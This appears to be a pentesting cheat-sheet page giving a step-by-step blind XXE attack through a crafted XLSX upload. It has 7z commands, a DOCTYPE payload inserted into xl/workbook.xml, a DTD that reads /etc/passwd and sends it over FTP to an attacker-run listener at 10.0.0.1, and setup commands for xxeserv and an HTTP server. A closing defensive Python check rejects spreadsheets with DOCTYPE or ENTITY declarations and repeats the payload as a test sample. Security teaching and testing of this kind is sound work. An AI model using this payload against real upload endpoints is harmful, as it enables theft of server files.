Blind XXE

Last modified: 2023-03-03

XXE (XML External Entity) injection is a vulnerability in which an attacker supplies crafted XML whose external entity declarations are processed by the server's XML parser. In blind XXE the application returns no parsed data in its response, so the attacker only learns the result out-of-band, for example through a request the parser makes to a host the attacker controls.

Inside XLSX File

An XLSX file is a Microsoft Excel spreadsheet. Internally it is a ZIP archive of XML parts (Office Open XML), which is why a server that accepts spreadsheet uploads ends up running an XML parser over attacker-controlled content.

1. Create an XLSX File

First we need to create an XLSX file using software such as LibreOffice Calc.

2. Extract the XLSX File

7z x -oXXE xxe.xlsx
cd XXE

We should see the extracted archive contents, including several “.xml” files.

3. Add Blind XXE Payload in the XML File

Insert the following payload at the top of xl/workbook.xml, so that the DOCTYPE sits between the XML declaration and the opening <workbook> element (the payload below already includes both; keep the rest of the file unchanged).
Replace “10.0.0.1” with your local IP address.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "http://10.0.0.1/xxe.dtd">%asd;%c;]>
<cdl>&rrr;</cdl>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">

4. Rebuild the XLSX File

cd XXE
7z u ../xxe.xlsx *

5. Create XXE inside a DTD File

Create “xxe.dtd” with the following content.
Replace “10.0.0.1” with your local IP address. The file contents are sent over FTP rather than HTTP because a multi-line file such as /etc/passwd is not valid inside an HTTP URL, whereas xxeserv's FTP listener still records it.

<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://10.0.0.1:2121/%d;'>">

6. Start a local server

Serve the DTD file using xxeserv.

git clone https://github.com/staaldraad/xxeserv.git
cd xxeserv
go mod init xxeftp.go
go build
go run xxeftp.go -o files.log -p 2121 -w -wd public -wp 8000

In another terminal, start a web server in the directory where “xxe.dtd” is located.

sudo python3 -m http.server 80

Now upload the “xxe.xlsx” file to the target website. If the server's XML parser processes the workbook with external entities enabled, the contents of the desired file appear in the xxeserv log.
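On the defensive side, the payload above only works because the server hands an uploaded workbook to an XML parser without first checking for a DOCTYPE. The following is an added example (not part of the original notes): a pre-parse check that opens an XLSX as a ZIP archive and rejects it if any XML part declares a DOCTYPE or ENTITY, demonstrated against a constructed minimal archive carrying the DOCTYPE from step 3.

```python
"""Reject XLSX uploads whose XML parts carry DOCTYPE/ENTITY declarations."""
import io
import re
import zipfile

# OOXML parts are plain XML and never legitimately carry a DOCTYPE, so any
# declaration is grounds for rejection before a parser ever sees the file.
XML_PART = re.compile(r"\.(xml|rels)$", re.IGNORECASE)
DOCTYPE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
ENTITY = re.compile(rb"<!ENTITY", re.IGNORECASE)


def find_xxe_parts(xlsx_bytes: bytes) -> list:
    """Return (part_name, reason) for every XML part that declares a DOCTYPE or ENTITY."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        for info in zf.infolist():
            if not XML_PART.search(info.filename):
                continue
            data = zf.read(info.filename)
            if DOCTYPE.search(data):
                findings.append((info.filename, "DOCTYPE declaration"))
            elif ENTITY.search(data):
                findings.append((info.filename, "ENTITY declaration"))
    return findings


def is_safe_xlsx(xlsx_bytes: bytes) -> bool:
    """True when no XML part in the archive declares a DOCTYPE or ENTITY."""
    return not find_xxe_parts(xlsx_bytes)


# Constructed samples: a benign workbook part and one carrying the DOCTYPE
# from step 3 (10.0.0.1 is the placeholder address used in the notes).
BENIGN_WORKBOOK = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
                   b'<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"/>')
XXE_WORKBOOK = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
                b'<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM '
                b'"http://10.0.0.1/xxe.dtd">%asd;%c;]>\n<cdl>&rrr;</cdl>\n'
                b'<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"/>')


def build_xlsx(workbook_xml: bytes) -> bytes:
    """Build a minimal XLSX-shaped ZIP in memory around the given workbook part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", b'<?xml version="1.0"?><Types/>')
        zf.writestr("xl/workbook.xml", workbook_xml)
    return buf.getvalue()


if __name__ == "__main__":
    print(find_xxe_parts(build_xlsx(XXE_WORKBOOK)))   # [('xl/workbook.xml', 'DOCTYPE declaration')]
    print(is_safe_xlsx(build_xlsx(BENIGN_WORKBOOK)))  # True
```

In an upload handler, run is_safe_xlsx on the raw bytes before any library opens the workbook; a rejected file is also a useful detection signal worth logging.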
